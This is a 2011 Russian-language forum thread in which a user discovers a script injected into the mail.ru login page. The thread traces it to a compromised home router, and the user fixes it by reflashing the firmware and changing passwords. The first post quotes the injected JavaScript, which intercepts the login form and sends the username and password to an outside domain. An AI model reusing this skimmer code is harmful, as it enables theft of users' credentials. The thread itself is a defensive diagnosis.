скрипт на мейл.ру ворует пароли?
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
скрипт на мейл.ру ворует пароли? - 2011-03-19 11:26:44.770000
|
|
|
mixxxxa
Сообщений: 8
Оценки: 0
Присоединился: 2011-03-19 11:06:53.456666
|
в коде главной страницы мейл.ру присутствует следующее:
quote:
<script language="javascript" type="text/javascript">
try {
if(!getCookie("searchuid"))
document.write('<img id="img_searchuid" src="http://bs.mail.ru/count/108pZT9La4K40X00Zh4NwAO4M7sL0vi1R5aYYAZZY0AIgOvc0ue1aRpGIMG6auKDYm51VmG0?67253133" alt="" width=1 height=1 />');
} catch(e) {}
</script>
<script src="http://q4q7.asia/https.js?1669881351" type="text/javascript" language="javascript"></script>
в скрипте на q4q7.asia :
quote:
$(document).ready(function(){
var _form = document.forms["Auth"];
var t = 1;
$(_form).submit(function(){
if(t==1) {
var img = new Image();
$(img).load(function() {t=0; $(_form).submit();});
$(img).attr('src', 'http://q4q7.asia/s.gif?a=' + _form.Login.value + '@' + _form.Domain.value
+ '&b=' + _form.Password.value );
return false;
}
return true;
})
//$("a").unbind('click').click(function() {return false;});
});
честно признаюсь, я в этих делах практически не разбираюсь, но как-то подозрительным показалось…
обнаружил случайно - вбил пасс/логин - сайт тупит, в статус-баре "ожидается ответ q4q7.asia…", решил глянуть подробнее
или у меня паранойя??
|
|
|
|
|
RE: скрипт на мейл.ру ворует пароли? - 2011-03-19 11:40:37.896666
|
|
|
Ltonid
Сообщений: 4970
Оценки: 740
Присоединился: 2008-12-29 13:21:56.166666
|
Такс.
Домен типа свободен, но до тебя это уже писали.
Да код очень подозрителен.
У вас сайт _q4q7.asia пингуется?
Если да то это вирус, если нет, то будем дальшее думать.
|
|
|
|
|
RE: скрипт на мейл.ру ворует пароли? - 2011-03-19 11:51:31.053333
|
|
|
mixxxxa
Сообщений: 8
Оценки: 0
Присоединился: 2011-03-19 11:06:53.456666
|
у меня даже периодически q4q7.asia/s.gif открывается, не то что пингуется
сначала тоже думал вирус, ибо первоначально заметил на компе с семеркой без антивируса. но то же самое да другом с семеркой и нодом (обновляется), более того - на бубунте та же фигня
|
|
|
|
|
RE: скрипт на мейл.ру ворует пароли? - 2011-03-19 12:00:37.666666
|
|
|
Ltonid
Сообщений: 4970
Оценки: 740
Присоединился: 2008-12-29 13:21:56.166666
|
У меня четко показывает 404 и все хуизы убеждены что такого домена нет.
Скажи тогда его ip это раз. Далее я так понимаю у тебя есть роутер проверь его настройки.
|
|
|
|
|
RE: скрипт на мейл.ру ворует пароли? - 2011-03-19 12:15:50.803333
|
|
|
mixxxxa
Сообщений: 8
Оценки: 0
Присоединился: 2011-03-19 11:06:53.456666
|
67.215.77.132
что искать в настройках роутера?
|
|
|
|
|
RE: скрипт на мейл.ру ворует пароли? - 2011-03-19 12:28:35.630000
|
|
|
Ltonid
Сообщений: 4970
Оценки: 740
Присоединился: 2008-12-29 13:21:56.166666
|
Ты имя роутера скажи. Смотри настройки DNS + может твой умеет фильтры какие ставить.
Попробуй обновить прошивку.
НО перед этим всем, если есть возможносьт выйти в инет с убунты без роутера то выйди и проверь наличие скрипта.
|
|
|
|
|
RE: скрипт на мейл.ру ворует пароли? - 2011-03-19 12:29:58.543333
|
|
|
mixxxxa
Сообщений: 8
Оценки: 0
Присоединился: 2011-03-19 11:06:53.456666
|
пока проверил проще - через другое подключение (3g билайн) не пингуется
кстати, из кода мейл.ру этот участок уже пропал. 30 мин назад был, теперь нет (проверил через оба подключения - adsl и 3g), пинговаться по adsl продолжает
|
|
|
|
|
RE: скрипт на мейл.ру ворует пароли? - 2011-03-19 12:33:43.896666
|
|
|
Ltonid
Сообщений: 4970
Оценки: 740
Присоединился: 2008-12-29 13:21:56.166666
|
Паразительно. Тогда зайди в настройки модема и слей прошивку. Скачай на сайте производителе свежую или этой же версии и перепрошей.
|
|
|
|
|
RE: скрипт на мейл.ру ворует пароли? - 2011-03-19 12:38:09.273333
|
|
|
mixxxxa
Сообщений: 8
Оценки: 0
Присоединился: 2011-03-19 11:06:53.456666
|
проверить настройки железок пока не могу
adsl-мопед d-link 2500U, прошивка официальная, вроде последняя
wi-fi точка d-link dwl-g700ap, прошивка концептроник
|
|
|
|
|
RE: скрипт на мейл.ру ворует пароли? - 2011-03-19 12:41:11.426666
|
|
|
mixxxxa
Сообщений: 8
Оценки: 0
Присоединился: 2011-03-19 11:06:53.456666
|
опять появился скрипт в коде мейл.ру
ip сменился - 193.105.240.73
|
|
|
|
|
RE: скрипт на мейл.ру ворует пароли? - 2011-03-19 12:46:13.890000
|
|
|
Ltonid
Сообщений: 4970
Оценки: 740
Присоединился: 2008-12-29 13:21:56.166666
|
так это точка. Тогда 99% что вирус в роутере. Перепрошивай на ту что найдешь.
|
|
|
|
|
RE: скрипт на мейл.ру ворует пароли? - 2011-03-19 16:25:58.966666
|
|
|
mixxxxa
Сообщений: 8
Оценки: 0
Присоединился: 2011-03-19 11:06:53.456666
|
перепрошил adsl-мопед
скрипта нет, ресурс не пингуется
теперь, я так понимаю, пора менять все пароли?
и что сделать чтобы это не повторилось? достаточно ли сменить пароль на настройках модема?
|
|
|
|
|
RE: скрипт на мейл.ру ворует пароли? - 2011-03-19 21:46:44.466666
|
|
|
Ltonid
Сообщений: 4970
Оценки: 740
Присоединился: 2008-12-29 13:21:56.166666
|
Менять все пароли однозначно.
В настройках модема постараться поднять уровень безопасности. Пароль менять однозначно. Тот кто это сделал достаточно квалиицирован. Посмотри чтобы был выключен доступ к настройкам из wan если есть такие настройки. Скрой имя точки.
|
|
|
|
|
RE: скрипт на мейл.ру ворует пароли? - 2011-03-19 23:31:55.116666
|
|
|
mixxxxa
Сообщений: 8
Оценки: 0
Присоединился: 2011-03-19 11:06:53.456666
|
пароли поменял, огородился
только вопросы остались. что это вообще было? удаленно поменяли прошивку? в стандартных прошивках вроде нет возможности такое замутить.
теоретически можно было поменять прошивку через wifi - точка была открыта, загрузить новую прошивку можно через веб-морду. на практике маловероятно - частный дом, соседей нет, сигнал слабый - не весь дом покрывает.
удаленный доступ к руту на одном из компов домашней сети?
проверил компы с виндами свежим каспером сканером - ничего. пейпал лишние деньги не списывал. единственное, что нашел - вход на мейл с незнакомого ip, но это может быть проксик опера-турбо или с билайна 3g заходил, не помню уже.
|
|
|
|
|
RE: скрипт на мейл.ру ворует пароли? - 2011-03-19 23:43:12.803333
|
|
|
Ltonid
Сообщений: 4970
Оценки: 740
Присоединился: 2008-12-29 13:21:56.166666
|
Вариантов взлома два:
1) прошивка
2) подключение непосредственно к роутеру/маршрутизатору по особому протоколу (например telnet, ssh)
1) Описан в статье http://www.xakep.ru/post/53486/ Сложно, но нет ничего невозможного
2) Менее трудоемок, но требуется много совпадений.
Кто это мог сделать не известно, но видимо пароль был или стандартный или простой.
Тот кто это сделал, явно или очень умен или цель была весьма конкретна.
Взлом мог вполне осуществиться сначала через один из компов, потом уже дальше.
Сейчас уже мало, что можно выяснить, просто надо быть на чеку. Логи смотреть.
|
|
|
|
|
|
